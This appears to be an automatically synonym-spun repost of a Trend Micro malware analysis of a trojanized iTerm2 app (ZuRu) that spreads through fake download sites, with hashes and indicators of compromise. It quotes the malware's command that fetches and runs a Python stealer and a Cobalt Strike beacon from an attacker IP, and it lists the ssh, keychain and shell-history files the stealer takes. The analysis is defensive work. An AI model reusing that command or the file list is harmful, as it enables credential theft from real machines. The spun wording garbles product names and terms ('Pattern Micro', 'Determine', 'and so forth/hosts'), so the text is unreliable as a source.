Mac Customers Focused by Trojanized iTerm2 App

0
157

[ad_1]

Mac Customers Focused by Trojanized iTerm2 App

We go into extra element a couple of pretend model of the iTerm2 app that downloads and runs malware, detected by Pattern Micro as TrojanSpy.Python.ZURU.A, which collects non-public knowledge from a sufferer’s machine.
By: Steven Du, Luis Magisa

September 30, 2021

Learn time:  ( phrases)

Earlier this month, a consumer on Chinese language question-and-answer web site Zhihu reported {that a} search engine outcome for the key phrase “iTerm2” led to a pretend web site known as item2.internet that mimics the reputable iterm2.com (Determine 1). A pretend model of the iTerm2 app, a macOS terminal emulator, might be downloaded from a hyperlink present in iterm2.internet. When this app is executed, it downloads and runs g.py, a malicious Python script from 47[.]75[.]123[.]111. This malware, which Pattern Micro has detected as TrojanSpy.Python.ZURU.A, collects non-public knowledge from a sufferer’s machine.

Determine 1. The fraudulent web site iterm2.internet

Goal-see beforehand printed a weblog entry about this malware, which analyzed how the menace actor repacks the iTerm2 app to load the malicious libcrypto.2.dylib. This, in flip, downloads and runs different parts, together with the aforementioned g.py script and a Mach-O file known as “GoogleUpdate” that comprises a Cobalt Strike beacon payload. This weblog entry covers the malware’s particulars.
The trojanized app
As of September 15, iterm2.internet continues to be lively. Nonetheless, the malicious file just isn’t hosted on this web site straight. As an alternative, the web site comprises a hyperlink, hxxp://www.kaidingle.com/iTerm/iTerm.dmg, from which customers are in a position to obtain a macOS disk picture file (DMG) known as iTerm.dmg. The consumer is redirected to this obtain URL for iTerm.dmg whatever the app model the consumer selects to obtain from the pretend web site; the true iterm2.com web site has completely different URLs and information for numerous variations. The information which are downloaded from the reputable web site are available in a ZIP file format, versus the DMG file from the fraudulent web site, as proven in Determine 2.

Determine 2. The file downloaded from the pretend web site (left) and the official web site (proper)

Evaluating the folder construction of the DMG and ZIP information reveals quite a few variations between them:

All of the Mach-O information within the trojanized iTerm2 app have been signed with an Apple Distribution certificates, as proven in Determine 3, whereas information within the reputable iTerm2.app are code signed with a Developer ID Software certificates. Based on Apple documentation, an Apple Distribution certificates is just used to signal an app earlier than the developer delivers it to the App Retailer, so apps downloaded from the App Retailer usually don’t have an Apple Distribution certificates.

Determine 3. Trojanized iTerm2 app code signing

The trojanized iTerm2 app comprises a file known as libcrypto.2.dylib (with a SHA-256 hash of 2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef) in its Frameworks folder, which doesn’t exist within the reputable model, as proven in Determine 4.

Determine 4. The libcrypto.2.lib file added within the trojanized iTerm2 app

Within the trojanized iTerm2 app, the primary Mach-O file has an extra load command known as LC_LOAD_DYLIB that hundreds the libcrypto.2.dylib file, proven in Determine 5.

Determine 5. The load command LC_LOAD_DYLIB hundreds the file libcrypto.2.dylib

Based on Goal-see’s weblog put up, the malicious codes contained within the libcrypto.2.dylib file are executed routinely when the sufferer runs the trojanized iTerm2 app. This can be a intelligent methodology for repacking reputable apps that we’ve got not seen earlier than.
As soon as executed, the malware connects to its server and receives these directions from it:

“curl -sfo /tmp/g.py http://47[.]75[.]123[.]111/g.py && chmod 777 /tmp/g.py && python /tmp/g.py && curl -sfo /tmp/GoogleUpdate http://47[.]75[.]123[.]111/GoogleUpdate && chmod 777 /tmp/GoogleUpdate && /tmp/GoogleUpdate”
Obtain the g.py script to the folder /tmp/g.py and execute it
Obtain “GoogleUpdate” to the folder /tmp/GoogleUpdate and execute it
Gather knowledge utilizing the g.py script

The Python script g.py collects the next system knowledge and information from the sufferer’s machine, which the script then sends to the server:

Working system data
Username
Put in functions
Native IP deal with
Copies of those information and folders:
~/.bash_history’
~/.zsh_history
~/.gitConfig
/and so forth/hosts
~/.ssh
~/.zhHistory
~/Library/Keychains/Login.keychain-db
~/Library/Software Help/VanDyke/SecureCRT/Config/
~/Library/Software Help/iTerm2/SavedState/

The contents of those directories:
~/ – {present consumer dwelling listing}
~/Desktop
~/Paperwork
~/Downloads
/Purposes

Different trojanized apps and faux websites
Additional evaluation of the trojanized iTerm2 app’s Apple Distribution certificates led us to search out comparable trojanized apps on VirusTotal (Desk 1), all of which have been trojanized utilizing the identical methodology.

Desk 1. Different trojanized apps discovered on VirusTotal
File Identify
SHA-256 Hash
Detection
iTerm.app.zip
5f59ead37fa836c6329a7ba3edd4afc9a2c5fec61de4e0cdb8e8a41031ae4db0
TrojanSpy.MacOS.ZURU.A
SecureCRT.dmg
ae0510032cd4699ef17de7ed1587918ffcd7ff7c9a77fc45f9d68effe2934132
Trojan.MacOS.ZuRu.PFH
SecureCRT.dmg
1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921
Trojan.MacOS.ZuRu.PFH
Microsoft Distant Desktop.dmg
5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259
TrojanSpy.MacOS.ZURU.A
Navicat15_cn.dmg
6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff
TrojanSpy.MacOS.ZURU.A
Navicat15_cn.dmg
91541cfc0474d6c06376460759517ae94f36fca74d5ab84cf5c23d98bd33939e
TrojanSpy.MacOS.ZURU.A

Looking VirusTotal for the Safe Sockets Layer (SSL) thumbprint that iterm2.internet used revealed a number of different fraudulent web sites. As proven in Determine 6, all of those web sites resolved to the identical IP deal with, 43[.]129[.]218[.]115.

Determine 6. Different pretend web sites discovered on VirusTotal

We have been in a position to entry one in every of these pretend web sites, snailsvn.cn, however the obtain hyperlink on its web page was empty at the moment, so it stays unsure whether or not this web site had been used to distribute a trojanized model of SnailSVN, an Apache Subversion (SVN) consumer for Mac OS X, within the wild (Determine 7). Nonetheless, all of those domains have been inaccessible on the time of writing.

Determine 7. The pretend SnailSVN web site

Obtain server
The server used for internet hosting the trojanized packages, kaidingle[.]com, was registered on September 7, and is presently nonetheless lively. Based on VirusTotal, other than iterm.dmg, it additionally hosts different DMG information comparable to SecureCTR.dmg and Navicat15_cn.dmg (Determine 8). As of September 18, the latter two DMG information can nonetheless be downloaded from the server.

Determine 8. URLs relating with obtain server

Primarily based on the server’s data on WHOIS, a question and response protocol, there are 4 different domains beneath the identical registrant (Determine 9). Nonetheless, to this point, none of those domains present any indication that they’re associated to any malware.

Determine 9. Different domains from the identical registrant

Second-stage server
VirusTotal recorded a number of URLs associated to a second-stage server beneath the IP deal with 47[.]75[.]123[.]111 – the identical deal with as that of the malicious g.py script – from September 8 to 17, as proven in Determine 10. 

Determine 10. URLs beneath the second-stage server

In addition to the g.py script and “GoogleUpdate” parts which are a part of the trojanized iTerm app malware routine, the second-stage server additionally hosts 4 different Mach-O information which are used as post-penetration instruments (Desk 2).

Desk 2. Different Mach-O information hosted within the second-stage server
File Identify
SHA-256 Hash
Description/Detection
la 
79ef23214c61228a03faea00a1859509ea3bf0247219d65ae6de335fde4061f5
An open supply intranet penetration scanner framework
(https://github.com/k8gege/LadonGo)

iox
f005ea1db6da3f56e4c8b1135218b1da56363b077d3be7d218d8284444d7824f
A instrument for port ahead and intranet proxy
(https://github.com/EddieIvan01/iox)

netscan-darwin-amd64
d12ef7f6de48c09e84143e90fe4a4e7b1b3d10cee5cd721f7fdf61e62e08e749 
Netscan scans a community for ports which are open on an IP/IP vary, and IP addressess which are in use on that community
(https://github.com/jessfraz/netscan/releases)

Host
a83edc0eb5a2f1db62acfa60c666b5a5c53733233ce264702a16cb5220df9d4e
Backdoor.MacOS.Wirenet.PFH

Notably, the IP deal with of the second-stage server is much like the one “GoogleUpdate” connects to, which is 47[.]75[.]96[.]198. Each of those IP addresses are hosted by Alibaba Hong Kong. As proven in Determine 11, the URLs beneath 47[.]75[.]96[.]198 have been registered across the similar time as these within the second-stage server, which means that these two servers could have been arrange by similar menace actor.

Determine 11. URLs beneath the identical server as “GoogleUpdate”

Commercial websites
As detailed within the aforementioned consumer report, the primary merchandise from the search engine outcomes is beneath the subdomain rjxz.jxhwst.high. Trying to find this deal with in Google generates two outcomes that lead solely to their cache (Determine 12), and as of this writing, their precise pages are already down.

Determine 12. Google caches of the 2 pretend websites

The primary search outcome, known as “Microsoft Distant Desktop,” has an deal with of hxxp://rjxz.jxhwst.high/3, however primarily based on its cache (Determine 13) and supply code (Determine 14), we discovered that it redirected guests to a pretend web site, hxxp://remotedesktop.vip.

Determine 13. The cache of the pretend “Microsoft Distant Desktop” web page

Determine 14. The supply code of the pretend web page

Upon checking its fundamental web page, we found that the second-level area jxhwst.high belongs to an agriculture firm north of China. Aside from the subdomain rjxz.jxhwst.high, this second-level area has 44 different subdomains, nearly all of that are used for ads that don’t have any relation to the agriculture firm (Determine 15). It’s doable that the corporate rents out these subdomains to others for promoting functions, however can’t forestall them from getting used for unlawful functions. If that is so, the menace actor rents the subdomain for malware distribution. 

Determine 15. The subdomains of the agriculture firm

Safety suggestions
To guard methods from threats like these, finish customers ought to solely obtain apps from official and legit marketplaces. They need to watch out in regards to the search outcomes from engines like google, and at all times double-check URLs to verify these actually level to the official websites. Mac customers can contemplate multilayered safety options comparable to Pattern Micro Antivirus for Mac®, which offers enhanced anti-scam safety that flags and blocks rip-off web sites that try to steal their private knowledge. They could additionally avail of Antivirus for Mac as a part of Pattern Micro Most Safety, a multi-platform answer that gives complete safety and multidevice safety in opposition to cyberthreats. 

Indicators of Compromise (IOCs)

File Identify
SHA-256 Hash
Detection
SecureCRT.dmg
1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921
TrojanSpy.MacOS.ZURU.A

com.microsoft.rdc.macos

5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259

TrojanSpy.MacOS.ZURU.A

iTerm.app.zip

5f59ead37fa836c6329a7ba3edd4afc9a2c5fec61de4e0cdb8e8a41031ae4db0

TrojanSpy.MacOS.ZURU.A

Navicat15_cn.dmg

6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff

TrojanSpy.MacOS.ZURU.A

Navicat15_cn.dmg

91541cfc0474d6c06376460759517ae94f36fca74d5ab84cf5c23d98bd33939e

TrojanSpy.MacOS.ZURU.A

SecureCRT.dmg

ae0510032cd4699ef17de7ed1587918ffcd7ff7c9a77fc45f9d68effe2934132

TrojanSpy.MacOS.ZURU.A

iTerm.dmg

e5126f74d430ff075d6f7edcae0c95b81a5e389bf47e4c742618a042f378a3fa

TrojanSpy.MacOS.ZURU.A

Microsoft Distant Desktop.dmg

4e8287b61b0269e0d704c6d064cb584c1378e9b950539fea366ee304f695743f

TrojanSpy.MacOS.ZURU.A

libcrypto.2.dylib

4aece9a7d73c1588ce9441af1df6856d8e788143cd9e53a2e9cf729e23877343

TrojanSpy.MacOS.ZURU.A

libcrypto.2.dylib

4e8287b61b0269e0d704c6d064cb584c1378e9b950539fea366ee304f695743f

TrojanSpy.MacOS.ZURU.A

libcrypto.2.dylib

8db4f17abc49da9dae124f5bf583d0645510765a6f7256d264c82c2b25becf8b

TrojanSpy.MacOS.ZURU.A

libcrypto.2.dylib

62cae3c971ed01c61454e4c3d9a8439cdcb409a8e1c5641e5c7c4ac7667cb5e5

TrojanSpy.MacOS.ZURU.A

libcrypto.2.dylib

aba7c61d2c16cdae17785a38b070df57aa3009f00686881642be31a589fabe0a

TrojanSpy.MacOS.ZURU.A

libcrypto.2.dylib

af2cb957387b7c4b0c5c9fa24a711988c9e8802e758622b321c9bdc5720120d2

TrojanSpy.MacOS.ZURU.A

libcrypto.2.dylib

e8184e1169373e2d529f23b9842f258dddc1d24c77ced0d12b08959967dfadef

TrojanSpy.MacOS.ZURU.A

libcrypto.2.dylib

2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef

TrojanSpy.MacOS.ZURU.A

g.py

ffb0a802fdf054d4988d68762d9922820bdc3728f0378fcd6c4ed28c06da5cf0

TrojanSpy.Python.ZURU.A

MITRE Ways, Strategies, and Procedures (TTPs)

Tags

sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk

[ad_2]